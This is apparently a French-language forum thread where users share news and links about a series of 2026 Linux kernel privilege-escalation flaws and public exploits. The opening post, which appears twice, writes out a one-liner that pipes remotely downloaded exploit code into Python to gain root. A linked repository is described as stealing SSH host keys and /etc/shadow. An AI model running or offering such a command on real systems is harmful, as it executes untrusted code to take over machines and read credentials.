Bonjour,
Faille de sécurité dans tous les linux depuis 2017 permettant un accès administrateur depuis n’importe quel compte utilisateur:
https://security-tracker.debian.org/tracker/CVE-2026-31431
$ curl https://copy.fail/exp | python3 && su
dino
Bonjour,
Faille de sécurité dans tous les linux depuis 2017 permettant un accès administrateur depuis n’importe quel compte utilisateur:
https://security-tracker.debian.org/tracker/CVE-2026-31431
$ curl https://copy.fail/exp | python3 && su
dino
proxmox a sortie un kernel v7 qui corrige donc la faille
et la petite soeur GitHub - V4bel/dirtyfrag · GitHub
pas encore de CVE ni de patch
Et le petit dernier GitHub - 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo: Copy Fail 2: Electric Boogaloo · GitHub
Bah c’est pas bientôt fini ?
on fait un focus que je ne vois pas habituellement ou il se passe un vrai truc ?
La première faille portait sur un bypass de la modification en RAM du cache d’un fichier sur disque.
Du coup tant le que cache de ce fichier reste en RAM, c’est comme si le fichier avait été modifié pour tout le système.
Les chercheurs en sécurité doivent chercher partout dans Linux si ce défaut logique est pas présent ailleurs… Et ça a été trouvé à 2 autres endroits. Quelle angoisse ^^’
une nginx et une suite de frag
Nouvel exploit ce coup ci sur les droits d’accès aux fichiers GitHub - 0xdeadbeefnetwork/ssh-keysign-pwn: Steal SSH host private keys and /etc/shadow via the ptrace_may_access mm-NULL bypass + pidfd_getfd. Pre-31e62c2ebbfd kernels. · GitHub
Ça devient récurrent les exploits le vendredi, en espérant qu’on sera tranquille vendredi prochain.
vous reprendrez bien une petite faille ? V12 (@v12sec): "today we are releasing a qemu escape" | XCancel
bonjour
une nouvelle
https://www.it-connect.fr/la-faille-dirtydecrypt-menace-les-serveurs-linux-un-poc-a-ete-publie/
dino
Il y en a un peu plus je vous le met quand même ? https://www.it-connect.fr/cifswitch-cette-faille-linux-presente-depuis-19-ans-offre-un-acces-root/